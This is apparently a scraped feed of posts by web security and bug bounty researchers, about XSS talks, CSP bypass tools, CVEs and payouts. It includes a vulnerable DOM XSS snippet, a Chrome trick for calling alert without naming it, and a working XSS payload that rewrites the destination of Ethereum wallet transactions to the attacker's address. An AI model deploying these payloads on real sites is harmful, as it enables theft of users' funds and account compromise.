In a shameless effort to promote my book. I've crafted some very special vectors for you. If you like them please purchase my book to read more. www.amazon.com/dp/B0BRD9B3GS

Been playing around with strudel.cc recently. It is pretty awesome! strudel.cc#Ly9Td2VldCBE...

Great interview with @racheltobac.bsky.social shining a light in a lot of important topics, like what are likely attack vectors, impact of #AI on #security, #ethics, affecting social interactions and #privacy . "Be politely paranoid." 👏 www.youtube.com/watch?v=xEdZ...

Coded some PHP today without using ChatGPT, like a mad man.

Time to reveal what I was doing with @teknogeek.io back in '19. All the hard work and sleepless nights have paid off!

Just finished a major UI overhaul of CSPBypass.com and would love your feedback. Excited to welcome ProjectDiscovery as our first sponsor. Huge thanks to their team for supporting the project and recognizing its value to the community.

I enabled sponsorships on Github for cspbypass.com. The main goal is to cover hosting fees etc. So if you want to support my work, I would highly appreciate it if you could become a sponsor. github.com/sponsors/ren... Thanks!

Forgot how to bug bounty.

LOL. almost 3 years after reporting it and it being fixed, I got assigned a CVE for a vuln I found 🙃 nvd.nist.gov/vuln/detail/...

Made hacking rooms work in real time. This demo connects three browsers with real time editing on. From Chrome I edit some HTML. This gets sent over websockets to the other browsers which call postMessage to a blob with a sandboxed iframe.

😍

I feel like I have all the pieces to a ATO chain. I just have no idea what the chain would be...

Epic Firefox XSS vectors by Masato Kinugawa. Now available on our XSS cheat sheet including variants found by me. Link to vectors👇 portswigger.net/web-security...

🏳️‍🌈

Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens. @0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet. Link to vector👇 portswigger.net/web-security...

Such a DOM XSS tease: var s=document.createElement('style');s.innerHTML=decodeURIComponent(location.hash.slice(1));document.head.appendChild(s)

Web2 Bugs + Crypto Bug Bounty Program = Drama.

For those who missed it, check out my talk, “Widgets Gone Wild: Exploiting XSS through Flawed postMessage Origin Checks.” 📺 Watch here: www.youtube.com/watch?v=qgB0... 🖥️ Follow along with the slides: 0-a.nl/nahamcon/

The slides and examples for my talk "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Origin Checks" at NahamCon can be found here: 0-a.nl/nahamcon/

The security team running a bug bounty program as soon as your report comes in:

Here is the official writeup of my XSS challenge on Intigriti. I think it contains some fun browser trivia even for those who did not look at the chall joaxcar.com/blog/2025/05...

The schedule got an update: Tune in at 1:35 PM (PDT) / 10:35 PM (CEST) for my talk!

Today I learned I not only have CVEs but also a "EUVD" 😀 euvd.enisa.europa.eu/enisa/EUVD-2...

If you’re into bug bounty hunting and like finding weird XSS bugs (like me 😊) in places most people overlook, come check out my talk at NahamCon 2025 this Friday, May 23. "Widgets Gone Wild: Exploiting XSS Through Flawed postMessage Checks"

I'm excited to be speaking at #NahamCon2025 on May 23rd! I'm going to be talking about a bug class that I believe is very undervalued, and will outline a methodology for how to find and exploit it in the wild. May the bounties rain down upon you! Details here: www.nahamcon.com

I did it! 🥳

Added a small feature to cspbypass.com that allows you to copy payloads by just clicking on them.

Pay. The. Bounty. Please.

Excited to be part of #nahamcon2025!

Fun little XSS payload that will always replace the "to" address of eth_sendTransaction with yours. !function(){if(!window.ethereum)return;let e=ethereum.request;ethereum.request=n=>(n?.method==="eth_sendTransaction"&&n.params?.[0]?.to&&(n.params[0].to="0x...[your wallet]"),e.apply(this,[n]))}();

Proud to announce I'll be speaking at NahamCon this year! www.nahamcon.com

Bug bounty in a nutshell.

Wow. Sora is pretty insane.

This is not me: x.com/renniepak If anyone could report, that would be greatly appreciated!

So annoying that HackenProof pays in USDT(TRC-20). And you can get paid in cash (USD) but they need like a CoC registration document to be able to receive the money. Never had to show that for any of the major platforms.

XSS is still the most common bug class that can be insanely profitable if you master it like my today's guest - Renniepak. In this interview, we talk XSS, CSP bypasses, access control, JS bookmarks, and more... Enjoy🔥

Following other's lead, I put together an XSS challenge to solve a somewhat tricky injection I'd come across. In producing the challenge I came up with my solution (so in that way I guess it served it's purpose) but interested in how other's would approach it 🤔 blog.ajxchapman.com/xss/challeng...

I found a fun XSS: Vulnerable site has a postMessage listener that can trigger a redirect to a javascript: URI but has a strict origin check to only accept messages from a specific 3rd party domain. Found a XSS on the 3rd party domain to send messages with the correct origin.

NEWS FLASH: Big Corp with $16 billion in annual revenue paid $200 to hackers for uncovering a high-severity security flaw in their core business.

Pettiness will kill bug bounty.

In case you didn't know JavaScript for hackers is also available as a paperback on Amazon too www.amazon.com/JavaScript-h...

I decided to take a look at the 2024 and choose the best bug bounty writeups, blogposts and tools, as well as the most underrated reports of the year. Enjoy🔥

Work-wise I am either 200% motivated or bored to death. Would be great if there was some kind of grey area there.

Found a handy new CSP bypass gadget on Snapchat: cspbypass.com#snapchat

Somehow I keep getting "invalid handle" once in a while. Not sure what's going on.

Yesterday I discovered a tweet of mine was referenced in the book "Attacking and Exploiting Modern Web Applications: Discover the mindset, techniques, and tools to perform modern web attacks and exploitation" www.amazon.nl/-/en/Simone-... Since I deleted my account, this is the tweet:

I’ve updated the bug bounty & content creators starter pack with classic research group @hackerschoice.bsky.social! Let me know if you’re not on this list and would like to be added. go.bsky.app/GD7hKPX

More here 😁 gist.github.com/tomnomnom/14...

In Chrome: Object.values(this)[165].bind(this)()

Is there a way to run alert() when "alert" is blocked by a WAF and unsafe-eval is not allowed?